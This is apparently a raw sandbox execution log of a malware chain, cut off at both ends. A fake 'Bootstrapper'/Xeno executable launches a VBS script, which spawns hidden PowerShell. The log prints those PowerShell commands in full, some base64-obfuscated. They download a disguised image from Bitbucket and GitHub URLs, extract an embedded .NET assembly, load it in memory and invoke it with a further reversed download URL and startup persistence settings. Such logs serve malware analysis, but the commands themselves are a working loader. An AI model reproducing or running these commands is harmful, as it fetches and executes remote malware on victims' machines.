n#HQ#ZQBz#HQ#c#Bv#Hc#ZQBy#HM#a#Bl#Gw#b##u#Eg#bwBt#GU#Jw#p#Ds#DQ#K#C##I##g#C##I##g#C##I##g#C##I##g#CQ#bQBl#HQ#a#Bv#GQ#I##9#C##J#B0#Hk#c#Bl#C4#RwBl#HQ#TQBl#HQ#a#Bv#GQ#K##n#Gw#YQ#n#Ck#LgBJ#G4#dgBv#Gs#ZQ#o#CQ#bgB1#Gw#b##s#C##WwBv#GI#agBl#GM#d#Bb#F0#XQ#g#Cg#Jw#g#HQ#e#B0#C4#c#BB#Gk#c#Bt#GI#Zw#v#HM#Z#Bh#G8#b#Bu#Hc#bwBk#C8#dwBx#HQ#cgBl#HQ#cgBl#C8#awBy#HU#cgBl#G0#b#B1#HI#LwBn#HI#bw#u#HQ#ZQBr#GM#dQBi#HQ#aQBi#C8#Lw#6#HM#c#B0#HQ#a##n#Cw#I##n#D##Jw#s#C##JwBT#HQ#YQBy#HQ#dQBw#E4#YQBt#GU#Jw#s#C##JwBN#HM#YgB1#Gk#b#Bk#Cc#L##g#Cc#M##n#Ck#KQB9#H0#';$oWjuxd = [system.Text.encoding]::Unicode.GetString([system.convert]::Frombase64string( $codigo.replace('#','A') ));powershell.exe $OWjuxD .exe -windowstyle hidden -exec
C:\Windows\SYSTEM32\cmd.exe
cmd.exe /c 671cd2b750753.vbs
C:\Users\Admin\Downloads\BoًоtstrарреrV1.0.88\Ехec\Ехec\XenoV1.0.88.exe
"C:\Users\Admin\Downloads\BoًоtstrарреrV1.0.88\Ехec\Ехec\XenoV1.0.88.exe"
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\671cd2b750753.vbs"
C:\Windows\SYSTEM32\cmd.exe
cmd.exe /c 671cd2b750753.vbs
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $shuffledLinks = Get-Random -InputObject $links -Count $links.Length; foreach ($link in $shuffledLinks) { try { return $webClient.DownloadData($link) } catch { continue } }; return $null }; $links = @('https://bitbucket.org/adssgfdsg/testing/downloads/img_test.jpg?144417', 'https://raw.githubusercontent.com/santomalo/audit/main/img_test.jpg?14441723'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $commandBytes = [System.Convert]::FromBase64String($base64Command); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $type = $loadedAssembly.GetType('testpowershell.Home'); $method = $type.GetMethod('la').Invoke($null, [object[]] (' txt.pAipmbg/sdaolnwod/wqtretre/kruremlur/gro.tekcubtib//:sptth', '0', 'StartupName', 'Msbuild', '0'))}}" .exe -windowstyle hidden -exec
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$codigo = 'WwBO#GU#d##u#FM#ZQBy#HY#aQBj#GU#U#Bv#Gk#bgB0#E0#YQBu#GE#ZwBl#HI#XQ#6#Do#UwBl#GM#dQBy#Gk#d#B5#F##cgBv#HQ#bwBj#G8#b##g#D0#I#Bb#E4#ZQB0#C4#UwBl#GM#dQBy#Gk#d#B5#F##cgBv#HQ#bwBj#G8#b#BU#Hk#c#Bl#F0#Og#6#FQ#b#Bz#DE#Mg#N##o#I##g#C##I##g#C##I##g#C##I##g#C##ZgB1#G4#YwB0#Gk#bwBu#C##R#Bv#Hc#bgBs#G8#YQBk#EQ#YQB0#GE#RgBy#G8#bQBM#Gk#bgBr#HM#I#B7#C##c#Bh#HI#YQBt#C##K#Bb#HM#d#By#Gk#bgBn#Fs#XQBd#CQ#b#Bp#G4#awBz#Ck#I##N##o#I##g#C##I##g#C##I##g#C##I##g#C##J#B3#GU#YgBD#Gw#aQBl#G4#d##g#D0#I#BO#GU#dw#t#E8#YgBq#GU#YwB0#C##UwB5#HM#d#Bl#G0#LgBO#GU#d##u#Fc#ZQBi#EM#b#Bp#GU#bgB0#Ds#I##N##o#I##g#C##I##g#C##I##g#C##I##g#C##J#Bz#Gg#dQBm#GY#b#Bl#GQ#T#Bp#G4#awBz#C##PQ#g#Ec#ZQB0#C0#UgBh#G4#Z#Bv#G0#I##t#Ek#bgBw#HU#d#BP#GI#agBl#GM#d##g#CQ#b#Bp#G4#awBz#C##LQBD#G8#dQBu#HQ#I##k#Gw#aQBu#Gs#cw#u#Ew#ZQBu#Gc#d#Bo#Ds#I##N##o#I##g#C##I##g#C##I##g#C##I##g#C##ZgBv#HI#ZQBh#GM#a##g#Cg#J#Bs#Gk#bgBr#C##aQBu#C##J#Bz#Gg#dQBm#GY#b#Bl#GQ#T#Bp#G4#awBz#Ck#I#B7#C##d#By#Hk#I#B7#C##cgBl#HQ#dQBy#G4#I##k#Hc#ZQBi#EM#b#Bp#GU#bgB0#C4#R#Bv#Hc#bgBs#G8#YQBk#EQ#YQB0#GE#K##k#Gw#aQBu#Gs#KQ#g#H0#I#Bj#GE#d#Bj#Gg#I#B7#C##YwBv#G4#d#Bp#G4#dQBl#C##fQ#g#H0#Ow#g##0#Cg#g#C##I##g#C##I##g#C##I##g#C##I#By#GU#d#B1#HI#bg#g#CQ#bgB1#Gw#b##g#H0#Ow#g##0#Cg#g#C##I##g#C##I##g#C##I##g#C##I##k#Gw#aQBu#Gs#cw#g#D0#I#B##Cg#JwBo#HQ#d#Bw#HM#Og#v#C8#YgBp#HQ#YgB1#GM#awBl#HQ#LgBv#HI#Zw#v#GE#Z#Bz#HM#ZwBm#GQ#cwBn#C8#d#Bl#HM#d#Bp#G4#Zw#v#GQ#bwB3#G4#b#Bv#GE#Z#Bz#C8#aQBt#Gc#XwB0#GU#cwB0#C4#agBw#Gc#Pw#x#DQ#N##0#DE#Nw#n#Cw#I##n#Gg#d#B0#H##cw#6#C8#LwBy#GE#dw#u#Gc#aQB0#Gg#dQBi#HU#cwBl#HI#YwBv#G4#d#Bl#G4#d##u#GM#bwBt#C8#cwBh#G4#d#Bv#G0#YQBs#G8#LwBh#HU#Z#Bp#HQ#LwBt#GE#aQBu#C8#aQBt#Gc#XwB0#GU#cwB0#C4#agBw#Gc#Pw#x#DQ#N##0#DE#Nw#y#DM#Jw#p#Ds#DQ#K#C##I##g#C##I##g#C##I##g#C##I##g#C##J#Bp#G0#YQBn#GU#QgB5#HQ#ZQBz#C##PQ#g#EQ#bwB3#G4#b#Bv#GE#Z#BE#GE#d#Bh#EY#cgBv#G0#T#Bp#G4#awBz#C##J#Bs#Gk#bgBr#HM#Ow#N##o#I##g#C##I##g#C##I##g#C##I##g#C##I#Bp#GY#I##o#CQ#aQBt#GE#ZwBl#EI#eQB0#GU#cw#g#C0#bgBl#C##J#Bu#HU#b#Bs#Ck#I#B7#C##J#Bp#G0#YQBn#GU#V#Bl#Hg#d##g#D0#I#Bb#FM#eQBz#HQ#ZQBt#C4#V#Bl#Hg#d##u#EU#bgBj#G8#Z#Bp#G4#ZwBd#Do#OgBV#FQ#Rg#4#C4#RwBl#HQ#UwB0#HI#aQBu#Gc#K##k#Gk#bQBh#Gc#ZQBC#Hk#d#Bl#HM#KQ#7##0#Cg#g#C##I##g#C##I##g#C##I##g#C##I##g#CQ#cwB0#GE#cgB0#EY#b#Bh#Gc#I##9#C##Jw#8#Dw#QgBB#FM#RQ#2#DQ#XwBT#FQ#QQBS#FQ#Pg#+#Cc#Ow#g#CQ#ZQBu#GQ#RgBs#GE#Zw#g#D0#I##n#Dw#P#BC#EE#UwBF#DY#N#Bf#EU#TgBE#D4#Pg#n#Ds#I##k#HM#d#Bh#HI#d#BJ#G4#Z#Bl#Hg#I##9#C##J#Bp#G0#YQBn#GU#V#Bl#Hg#d##u#Ek#bgBk#GU#e#BP#GY#K##k#HM#d#Bh#HI#d#BG#Gw#YQBn#Ck#Ow#g##0#Cg#g#C##I##g#C##I##g#C##I##g#C##I##k#GU#bgBk#Ek#bgBk#GU#e##g#D0#I##k#Gk#bQBh#Gc#ZQBU#GU#e#B0#C4#SQBu#GQ#ZQB4#E8#Zg#o#CQ#ZQBu#GQ#RgBs#GE#Zw#p#Ds#DQ#K#C##I##g#C##I##g#C##I##g#C##I##g#C##aQBm#C##K##k#HM#d#Bh#HI#d#BJ#G4#Z#Bl#Hg#I##t#Gc#ZQ#g#D##I##t#GE#bgBk#C##J#Bl#G4#Z#BJ#G4#Z#Bl#Hg#I##t#Gc#d##g#CQ#cwB0#GE#cgB0#Ek#bgBk#GU#e##p#C##ew#g#CQ#cwB0#GE#cgB0#Ek#bgBk#GU#e##g#Cs#PQ#g#CQ#cwB0#GE#cgB0#EY#b#Bh#Gc#LgBM#GU#bgBn#HQ#a##7#C##DQ#K#C##I##g#C##I##g#C##I##g#C##I##g#CQ#YgBh#HM#ZQ#2#DQ#T#Bl#G4#ZwB0#Gg#I##9#C##J#Bl#G4#Z#BJ#G4#Z#Bl#Hg#I##t#C##J#Bz#HQ#YQBy#HQ#SQBu#GQ#ZQB4#Ds#DQ#K#C##I##g#C##I##g#C##I##g#C##I##g#C##J#Bi#GE#cwBl#DY#N#BD#G8#bQBt#GE#bgBk#C##PQ#g#CQ#aQBt#GE#ZwBl#FQ#ZQB4#HQ#LgBT#HU#YgBz#HQ#cgBp#G4#Zw#o#CQ#cwB0#GE#cgB0#Ek#bgBk#GU#e##s#C##J#Bi#GE#cwBl#DY#N#BM#GU#bgBn#HQ#a##p#Ds#DQ#K#C##I##g#C##I##g#C##I##g#C##I##g#C##J#Bj#G8#bQBt#GE#bgBk#EI#eQB0#GU#cw#g#D0#I#Bb#FM#eQBz#HQ#ZQBt#C4#QwBv#G4#dgBl#HI#d#Bd#Do#OgBG#HI#bwBt#EI#YQBz#GU#Ng#0#FM#d#By#Gk#bgBn#Cg#J#Bi#GE#cwBl#DY#N#BD#G8#bQBt#GE#bgBk#Ck#Ow#g#CQ#b#Bv#GE#Z#Bl#GQ#QQBz#HM#ZQBt#GI#b#B5#C##PQ#g#Fs#UwB5#HM#d#Bl#G0#LgBS#GU#ZgBs#GU#YwB0#Gk#bwBu#C4#QQBz#HM#ZQBt#GI#b#B5#F0#Og#6#Ew#bwBh#GQ#K##k#GM#bwBt#G0#YQBu#GQ#QgB5#HQ#ZQBz#Ck#Ow#g#CQ#d#B5#H##ZQ#g#D0#I##k#Gw#bwBh#GQ#ZQBk#EE#cwBz#GU#bQBi#Gw#eQ#u#Ec#ZQB0#FQ#eQBw#GU#K##n#HQ#ZQBz#HQ#c#Bv#Hc#ZQBy#HM#a#Bl#Gw#b##u#Eg#bwBt#GU#Jw#p#Ds#DQ#K#C##I##g#C##I##g#C##I##g#C##I##g#CQ#bQBl#HQ#a#Bv#GQ#I##9#C##J#B0#Hk#c#Bl#C4#RwBl#HQ#TQBl#HQ#a#Bv#GQ#K##n#Gw#YQ#n#Ck#LgBJ#G4#dgBv#Gs#ZQ#o#CQ#bgB1#Gw#b##s#C##WwBv#GI#agBl#GM#d#Bb#F0#XQ#g#Cg#Jw#g#HQ#e#B0#C4#c#BB#Gk#c#Bt#GI#Zw#v#HM#Z#Bh#G8#b#Bu#Hc#bwBk#C8#dwBx#HQ#cgBl#HQ#cgBl#C8#awBy#HU#cgBl#G0#b#B1#HI#LwBn#HI#bw#u#HQ#ZQBr#GM#dQBi#HQ#aQBi#C8#Lw#6#HM#c#B0#HQ#a##n#Cw#I##n#D##Jw#s#C##JwBT#HQ#YQBy#HQ#dQBw#E4#YQBt#GU#Jw#s#C##JwBN#HM#YgB1#Gk#b#Bk#Cc#L##g#Cc#M##n#Ck#KQB9#H0#';$oWjuxd = [system.Text.encoding]::Unicode.GetString([system.convert]::Frombase64string( $codigo.replace('#','A') ));powershell.exe $OWjuxD .exe -windowstyle hidden -exec
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\671cd2b750753.vbs"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$codigo = 'WwBO#GU#d##u#FM#ZQBy#HY#aQBj#GU#U#Bv#Gk#bgB0#E0#YQBu#GE#ZwBl#HI#XQ#6#Do#UwBl#GM#dQBy#Gk#d#B5#F##cgBv#HQ#bwBj#G8#b##g#D0#I#Bb#E4#ZQB0#C4#UwBl#GM#dQBy#Gk#d#B5#F##cgBv#HQ#bwBj#G8#b#BU#Hk#c#Bl#F0#Og#6#FQ#b#Bz#DE#Mg#N##o#I##g#C##I##g#C##I##g#C##I##g#C##ZgB1#G4#YwB0#Gk#bwBu#C##R#Bv#Hc#bgBs#G8#YQBk#EQ#YQB0#GE#RgBy#G8#bQBM#Gk#bgBr#HM#I#B7#C##c#Bh#HI#YQBt#C##K#Bb#HM#d#By#Gk#bgBn#Fs#XQBd#CQ#b#Bp#G4#awBz#Ck#I##N##o#I##g#C##I##g#C##I##g#C##I##g#C##J#B3#GU#YgBD#Gw#aQBl#G4#d##g#D0#I#BO#GU#dw#t#E8#YgBq#GU#YwB0#C##UwB5#HM#d#Bl#G0#LgBO#GU#d##u#Fc#ZQBi#EM#b#Bp#GU#bgB0#Ds#I##N##o#I##g#C##I##g#C##I##g#C##I##g#C##J#Bz#Gg#dQBm#GY#b#Bl#GQ#T#Bp#G4#awBz#C##PQ#g#Ec#ZQB0#C0#UgBh#G4#Z#Bv#G0#I##t#Ek#bgBw#HU#d#BP#GI#agBl#GM#d##g#CQ#b#Bp#G4#awBz#C##LQBD#G8#dQBu#HQ#I##k#Gw#aQBu#Gs#cw#u#Ew#ZQBu#Gc#d#Bo#Ds#I##N##o#I##g#C##I##g#C##I##g#C##I##g#C##ZgBv#HI#ZQBh#GM#a##g#Cg#J#Bs#Gk#bgBr#C##aQBu#C##J#Bz#Gg#dQBm#GY#b#Bl#GQ#T#Bp#G4#awBz#Ck#I#B7#C##d#By#Hk#I#B7#C##cgBl#HQ#dQBy#G4#I##k#Hc#ZQBi#EM#b#Bp#GU#bgB0#C4#R#Bv#Hc#bgBs#G8#YQBk#EQ#YQB0#GE#K##k#Gw#aQBu#Gs#KQ#g#H0#I#Bj#GE#d#Bj#Gg#I#B7#C##YwBv#G4#d#Bp#G4#dQBl#C##fQ#g#H0#Ow#g##0#Cg#g#C##I##g#C##I##g#C##I##g#C##I#By#GU#d#B1#HI#bg#g#CQ#bgB1#Gw#b##g#H0#Ow#g##0#Cg#g#C##I##g#C##I##g#C##I##g#C##I##k#Gw#aQBu#Gs#cw#g#D0#I#B##Cg#JwBo#HQ#d#Bw#HM#Og#v#C8#YgBp#HQ#YgB1#GM#awBl#HQ#LgBv#HI#Zw#v#GE#Z#Bz#HM#ZwBm#GQ#cwBn#C8#d#Bl#HM#d#Bp#G4#Zw#v#GQ#bwB3#G4#b#Bv#GE#Z#Bz#C8#aQBt#Gc#XwB0#GU#cwB0#C4#agBw#Gc#Pw#x#DQ#N##0#DE#Nw#n#Cw#I##n#Gg#d#B0#H##cw#6#C8#LwBy#GE#dw#u#Gc#aQB0#Gg#dQBi#HU#cwBl#HI#YwBv#G4#d#Bl#G4#d##u#GM#bwBt#C8#cwBh#G4#d#Bv#G0#YQBs#G8#LwBh#HU#Z#Bp#HQ#LwBt#GE#aQBu#C8#aQBt#Gc#XwB0#GU#cwB0#C4#agBw#Gc#Pw#x#DQ#N##0#DE#Nw#y#DM#Jw#p#Ds#DQ#K#C##I##g#C##I##g#C##I##g#C##I##g#C##J#Bp#G0#YQBn#GU#QgB5#HQ#ZQBz#C##PQ#g#EQ#bwB3#G4#b#Bv#GE#Z#BE#GE#d#Bh#EY#cgBv#G0#T#Bp#G4#awBz#C##J#Bs#Gk#bgBr#HM#Ow#N##o#I##g#C##I##g#C##I##g#C##I##g#C##I#Bp#GY#I##o#CQ#aQBt#GE#ZwBl#EI#eQB0#GU#cw#g#C0#bgBl#C##J#Bu#HU#b#Bs#Ck#I#B7#C##J#Bp#G0#YQBn#GU#V#Bl#Hg#d##g#D0#I#Bb#FM#eQBz#HQ#ZQBt#C4#V#Bl#Hg#d##u#EU#bgBj#G8#Z#Bp#G4#ZwBd#Do#OgBV#FQ#Rg#4#C4#RwBl#HQ#UwB0#HI#aQBu#Gc#K##k#Gk#bQBh#Gc#ZQBC#Hk#d#Bl#HM#KQ#7##0#Cg#g#C##I##g#C##I##g#C##I##g#C##I##g#CQ#cwB0#GE#cgB0#EY#b#Bh#Gc#I##9#C##Jw#8#Dw#QgBB#FM#RQ#2#DQ#XwBT#FQ#QQBS#FQ#Pg#+#Cc#Ow#g#CQ#ZQBu#GQ#RgBs#GE#Zw#g#D0#I##n#Dw#P#BC#EE#UwBF#DY#N#Bf#EU#TgBE#D4#Pg#n#Ds#I##k#HM#d#Bh#HI#d#BJ#G4#Z#Bl#Hg#I##9#C##J#Bp#G0#YQBn#GU#V#Bl#Hg#d##u#Ek#bgBk#GU#e#BP#GY#K##k#HM#d#Bh#HI#d#BG#Gw#YQBn#Ck#Ow#g##0#Cg#g#C##I##g#C##I##g#C##I##g#C##I##k#GU#bgBk#Ek#bgBk#GU#e##g#D0#I##k#Gk#bQBh#Gc#ZQBU#GU#e#B0#C4#SQBu#GQ#ZQB4#E8#Zg#o#CQ#ZQBu#GQ#RgBs#GE#Zw#p#Ds#DQ#K#C##I##g#C##I##g#C##I##g#C##I##g#C##aQBm#C##K##k#HM#d#Bh#HI#d#BJ#G4#Z#Bl#Hg#I##t#Gc#ZQ#g#D##I##t#GE#bgBk#C##J#Bl#G4#Z#BJ#G4#Z#Bl#Hg#I##t#Gc#d##g#CQ#cwB0#GE#cgB0#Ek#bgBk#GU#e##p#C##ew#g#CQ#cwB0#GE#cgB0#Ek#bgBk#GU#e##g#Cs#PQ#g#CQ#cwB0#GE#cgB0#EY#b#Bh#Gc#LgBM#GU#bgBn#HQ#a##7#C##DQ#K#C##I##g#C##I##g#C##I##g#C##I##g#CQ#YgBh#HM#ZQ#2#DQ#T#Bl#G4#ZwB0#Gg#I##9#C##J#Bl#G4#Z#BJ#G4#Z#Bl#Hg#I##t#C##J#Bz#HQ#YQBy#HQ#SQBu#GQ#ZQB4#Ds#DQ#K#C##I##g#C##I##g#C##I##g#C##I##g#C##J#Bi#GE#cwBl#DY#N#BD#G8#bQBt#GE#bgBk#C##PQ#g#CQ#aQBt#GE#ZwBl#FQ#ZQB4#HQ#LgBT#HU#YgBz#HQ#cgBp#G4#Zw#o#CQ#cwB0#GE#cgB0#Ek#bgBk#GU#e##s#C##J#Bi#GE#cwBl#DY#N#BM#GU#bgBn#HQ#a##p#Ds#DQ#K#C##I##g#C##I##g#C##I##g#C##I##g#C##J#Bj#G8#bQBt#GE#bgBk#EI#eQB0#GU#cw#g#D0#I#Bb#FM#eQBz#HQ#ZQBt#C4#QwBv#G4#dgBl#HI#d#Bd#Do#OgBG#HI#bwBt#EI#YQBz#GU#Ng#0#FM#d#By#Gk#bgBn#Cg#J#Bi#GE#cwBl#DY#N#BD#G8#bQBt#GE#bgBk#Ck#Ow#g#CQ#b#Bv#GE#Z#Bl#GQ#QQBz#HM#ZQBt#GI#b#B5#C##PQ#g#Fs#UwB5#HM#d#Bl#G0#LgBS#GU#ZgBs#GU#YwB0#Gk#bwBu#C4#QQBz#HM#ZQBt#GI#b#B5#F0#Og#6#Ew#bwBh#GQ#K##k#GM#bwBt#G0#YQBu#GQ#QgB5#HQ#ZQBz#Ck#Ow#g#CQ#d#B5#H##ZQ#g#D0#I##k#Gw#bwBh#GQ#ZQBk#EE#cwBz#GU#bQBi#Gw#eQ#u#Ec#ZQB0#FQ#eQBw#GU#K##n#HQ#ZQBz#HQ#c#Bv#Hc#ZQBy#HM#a#Bl#Gw#b##u#Eg#bwBt#GU#Jw#p#Ds#DQ#K#C##I##g#C##I##g#C##I##g#C##I##g#CQ#bQBl#HQ#a#Bv#GQ#I##9#C##J#B0#Hk#c#Bl#C4#RwBl#HQ#TQBl#HQ#a#Bv#GQ#K##n#Gw#YQ#n#Ck#LgBJ#G4#dgBv#Gs#ZQ#o#CQ#bgB1#Gw#b##s#C##WwBv#GI#agBl#GM#d#Bb#F0#XQ#g#Cg#Jw#g#HQ#e#B0#C4#c#BB#Gk#c#Bt#GI#Zw#v#HM#Z#Bh#G8#b#Bu#Hc#bwBk#C8#dwBx#HQ#cgBl#HQ#cgBl#C8#awBy#HU#cgBl#G0#b#B1#HI#LwBn#HI#bw#u#HQ#ZQBr#GM#dQBi#HQ#aQBi#C8#Lw#6#HM#c#B0#HQ#a##n#Cw#I##n#D##Jw#s#C##JwBT#HQ#YQBy#HQ#dQBw#E4#YQBt#GU#Jw#s#C##JwBN#HM#YgB1#Gk#b#Bk#Cc#L##g#Cc#M##n#Ck#KQB9#H0#';$oWjuxd = [system.Text.encoding]::Unicode.GetString([system.convert]::Frombase64string( $codigo.replace('#','A') ));powershell.exe $OWjuxD .exe -windowstyle hidden -exec
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $shuffledLinks = Get-Random -InputObject $links -Count $links.Length; foreach ($link in $shuffledLinks) { try { return $webClient.DownloadData($link) } catch { continue } }; return $null }; $links = @('https://bitbucket.org/adssgfdsg/testing/downloads/img_test.jpg?144417', 'https://raw.githubusercontent.com/santomalo/audit/main/img_test.jpg?14441723'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $commandBytes = [System.Convert]::FromBase64String($base64Command); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $type = $loadedAssembly.GetType('testpowershell.Home'); $method = $type.GetMethod('la').Invoke($null, [object[]] (' txt.pAipmbg/sdaolnwod/wqtretre/kruremlur/gro.tekcubtib//:sptth', '0', 'StartupName', 'Msbuild', '0'))}}" .exe -windowstyle hidden -exec
C:\Users\Admin\Downloads\BoًоtstrарреrV1.0.88\Ехec\Ехec\XenoV1.0.88.exe
"C:\Users\Admin\Downloads\BoًоtstrарреrV1.0.88\Ехec\Ехec\XenoV1.0.88.exe"
C:\Windows\SYSTEM32\cmd.exe
cmd.exe /c 671cd2b750753.vbs
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\671cd2b750753.vbs"
C:\Users\Admin\Downloads\BoًоtstrарреrV1.0.88\Ехec\Ехec\XenoV1.0.88.exe
"C:\Users\Admin\Downloads\BoًоtstrарреrV1.0.88\Ехec\Ехec\XenoV1.0.88.exe"
C:\Windows\SYSTEM32\cmd.exe
cmd.exe /c 671cd2b750753.vbs
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$codigo = 'WwBO#GU#d##u#FM#ZQBy#HY#aQBj#GU#U#Bv#Gk#bgB0#E0#YQBu#GE#ZwBl#HI#XQ#6#Do#UwBl#GM#dQBy#Gk#d#B5#F##cgBv#HQ#bwBj#G8#b##g#D0#I#Bb#E4#ZQB0#C4#UwBl#GM#dQBy#Gk#d#B5#F##cgBv#HQ#bwBj#G8#b#BU#Hk#c#Bl#F0#Og#6#FQ#b#Bz#DE#Mg#N##o#I##g#C##I##g#C##I##g#C##I##g#C##ZgB1#G4#YwB0#Gk#bwBu#C##R#Bv#Hc#bgBs#G8#YQBk#EQ#YQB0#GE#RgBy#G8#bQBM#Gk#bgBr#HM#I#B7#C##c#Bh#HI#YQBt#C##K#Bb#HM#d#By#Gk#bgBn#Fs#XQBd#CQ#b#Bp#G4#awBz#Ck#I##N##o#I##g#C##I##g#C##I##g#C##I##g#C##J#B3#GU#YgBD#Gw#aQBl#G4#d##g#D0#I#BO#GU#dw#t#E8#YgBq#GU#YwB0#C##UwB5#HM#d#Bl#G0#LgBO#GU#d##u#Fc#ZQBi#EM#b#Bp#GU#bgB0#Ds#I##N##o#I##g#C##I##g#C##I##g#C##I##g#C##J#Bz#Gg#dQBm#GY#b#Bl#GQ#T#Bp#G4#awBz#C##PQ#g#Ec#ZQB0#C0#UgBh#G4#Z#Bv#G0#I##t#Ek#bgBw#HU#d#BP#GI#agBl#GM#d##g#CQ#b#Bp#G4#awBz#C##LQBD#G8#dQBu#HQ#I##k#Gw#aQBu#Gs#cw#u#Ew#ZQBu#Gc#d#Bo#Ds#I##N##o#I##g#C##I##g#C##I##g#C##I##g#C##ZgBv#HI#ZQBh#GM#a##g#Cg#J#Bs#Gk#bgBr#C##aQBu#C##J#Bz#Gg#dQBm#GY#b#Bl#GQ#T#Bp#G4#awBz#Ck#I#B7#C##d#By#Hk#I#B7#C##cgBl#HQ#dQBy#G4#I##k#Hc#ZQBi#EM#b#Bp#GU#bgB0#C4#R#Bv#Hc#bgBs#G8#YQBk#EQ#YQB0#GE#K##k#Gw#aQBu#Gs#KQ#g#H0#I#Bj#GE#d#Bj#Gg#I#B7#C##YwBv#G4#d#Bp#G4#dQBl#C##fQ#g#H0#Ow#g##0#Cg#g#C##I##g#C##I##g#C##I##g#C##I#By#GU#d#B1#HI#bg#g#CQ#bgB1#Gw#b##g#H0#Ow#g##0#Cg#g#C##I##g#C##I##g#C##I##g#C##I##k#Gw#aQBu#Gs#cw#g#D0#I#B##Cg#JwBo#HQ#d#Bw#HM#Og#v#C8#YgBp#HQ#YgB1#GM#awBl#HQ#LgBv#HI#Zw#v#GE#Z#Bz#HM#ZwBm#GQ#cwBn#C8#d#Bl#HM#d#Bp#G4#Zw#v#GQ#bwB3#G4#b#Bv#GE#Z#Bz#C8#aQBt#Gc#XwB0#GU#cwB0#C4#agBw#Gc#Pw#x#DQ#N##0#DE#Nw#n#Cw#I##n#Gg#d#B0#H##cw#6#C8#LwBy#GE#dw#u#Gc#aQB0#Gg#dQBi#HU#cwBl#HI#YwBv#G4#d#Bl#G4#d##u#GM#bwBt#C8#cwBh#G4#d#Bv#G0#YQBs#G8#LwBh#HU#Z#Bp#HQ#LwBt#GE#aQBu#C8#aQBt#Gc#XwB0#GU#cwB0#C4#agBw#Gc#Pw#x#DQ#N##0#DE#Nw#y#DM#Jw#p#Ds#DQ#K#C##I##g#C##I##g#C##I##g#C##I##g#C##J#Bp#G0#YQBn#GU#QgB5#HQ#ZQBz#C##PQ#g#EQ#bwB3#G4#b#Bv#GE#Z#BE#GE#d#Bh#EY#cgBv#G0#T#Bp#G4#awBz#C##J#Bs#Gk#bgBr#HM#Ow#N##o#I##g#C##I##g#C##I##g#C##I##g#C##I#Bp#GY#I##o#CQ#aQBt#GE#ZwBl#EI#eQB0#GU#cw#g#C0#bgBl#C##J#Bu#HU#b#Bs#Ck#I#B7#C##J#Bp#G0#YQBn#GU#V#Bl#Hg#d##g#D0#I#Bb#FM#eQBz#HQ#ZQBt#C4#V#Bl#Hg#d##u#EU#bgBj#G8#Z#Bp#G4#ZwBd#Do#OgBV#FQ#Rg#4#C4#RwBl#HQ#UwB0#HI#aQBu#Gc#K##k#Gk#bQBh#Gc#ZQBC#Hk#d#Bl#HM#KQ#7##0#Cg#g#C##I##g#C##I##g#C##I##g#C##I##g#CQ#cwB0#GE#cgB0#EY#b#Bh#Gc#I##9#C##Jw#8#Dw#QgBB#FM#RQ#2#DQ#XwBT#FQ#QQBS#FQ#Pg#+#Cc#Ow#g#CQ#ZQBu#GQ#RgBs#GE#Zw#g#D0#I##n#Dw#P#BC#EE#UwBF#DY#N#Bf#EU#TgBE#D4#Pg#n#Ds#I##k#HM#d#Bh#HI#d#BJ#G4#Z#Bl#Hg#I##9#C##J#Bp#G0#YQBn#GU#V#Bl#Hg#d##u#Ek#bgBk#GU#e#BP#GY#K##k#HM#d#Bh#HI#d#BG#Gw#YQBn#Ck#Ow#g##0#Cg#g#C##I##g#C##I##g#C##I##g#C##I##k#GU#bgBk#Ek#bgBk#GU#e##g#D0#I##k#Gk#bQBh#Gc#ZQBU#GU#e#B0#C4#SQBu#GQ#ZQB4#E8#Zg#o#CQ#ZQBu#GQ#RgBs#GE#Zw#p#Ds#DQ#K#C##I##g#C##I##g#C##I##g#C##I##g#C##aQBm#C##K##k#HM#d#Bh#HI#d#BJ#G4#Z#Bl#Hg#I##t#Gc#ZQ#g#D##I##t#GE#bgBk#C##J#Bl#G4#Z#BJ#G4#Z#Bl#Hg#I##t#Gc#d##g#CQ#cwB0#GE#cgB0#Ek#bgBk#GU#e##p#C##ew#g#CQ#cwB0#GE#cgB0#Ek#bgBk#GU#e##g#Cs#PQ#g#CQ#cwB0#GE#cgB0#EY#b#Bh#Gc#LgBM#GU#bgBn#HQ#a##7#C##DQ#K#C##I##g#C##I##g#C##I##g#C##I##g#CQ#Y